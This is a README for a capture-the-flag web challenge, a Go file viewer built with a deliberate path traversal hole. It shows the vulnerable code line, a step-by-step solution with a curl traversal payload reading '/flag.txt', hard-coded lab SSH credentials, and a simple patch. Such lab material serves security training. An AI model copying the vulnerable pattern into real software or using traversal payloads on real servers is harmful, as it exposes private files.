# File Viewer Challenge ## Description A simple web challenge featuring a Local File Inclusion (LFI) vulnerability. Players need to exploit the file viewer functionality to read the flag located at `/flag.txt`. ## Challenge Overview - Simple file viewer web application - Players can view sample files through the `/view` endpoint - The file parameter is vulnerable to path traversal - The flag is located at `/flag.txt` - **No flag validation** - players must exploit the vulnerability to read the flag ## Endpoints - `/` - Main page with file viewer interface - `/view?file=` - View files (vulnerable to LFI) ## Files Structure - `/opt/challenge` - The compiled Go binary - `/opt/index.html` - HTML template - `/opt/main.go` - Source code (can be modified) - `/opt/rebuild.sh` - Script to rebuild the challenge after patching - `/opt/files/welcome.txt` - Sample file - `/opt/files/info.txt` - Info about the file viewer - `/opt/files/hint.txt` - Hint for the challenge - `/flag.txt` - The flag file (target, read-only) ## Vulnerability The `/view` endpoint uses `filepath.Join()` to concatenate the base directory with user input: ```go filePath := filepath.Join("/opt/files/", filename) ``` This is vulnerable to path traversal attacks. Players can use `../` sequences to escape the `/opt/files/` directory and read arbitrary files on the system. ## Solution 1. Access the file viewer at http://localhost:14000 2. Notice the `/view?file=welcome.txt` endpoint 3. Try path traversal: `/view?file=../flag.txt` (won't work - resolves to `/opt/flag.txt`) 4. Use more `../` sequences: `/view?file=../../flag.txt` 5. This resolves to `/opt/files/../../flag.txt` = `/flag.txt` 6. Read the flag ## Example Exploit ```bash # Read the flag curl http://localhost:14000/view?file=../../flag.txt ``` ## Deployment ```bash docker-compose up --build -d ``` ## Access - Web: http://localhost:14000 - SSH: ssh ctfuser@localhost -p 14022 (password: warmup123) ## Patching the Challenge Players can patch the vulnerability by: 1. SSH into the container 2. Edit `/opt/main.go` to fix the LFI vulnerability 3. Run `/opt/rebuild.sh` to rebuild and restart the challenge 4. Test that the vulnerability is fixed Example fix - add path validation: ```go // Prevent path traversal if strings.Contains(filename, "..") { http.Error(w, "Invalid file path", http.StatusBadRequest) return } ```